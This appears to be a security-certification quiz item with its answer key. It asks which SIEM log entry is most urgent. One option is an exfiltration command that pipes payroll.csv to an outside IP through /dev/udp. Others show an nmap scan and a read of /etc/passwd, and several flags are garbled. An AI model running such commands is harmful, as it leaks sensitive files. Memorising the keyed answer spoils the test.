A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users.
Which of the following would require immediate attention?
A . nmap CA CsV 192.168.1.235
B . cat payroll.csv > /dev/udp/123.456.123.456/53
C . cat/etc/passwd
D . mysql Ch 192.168.1.235 Cu test -p
Answer: B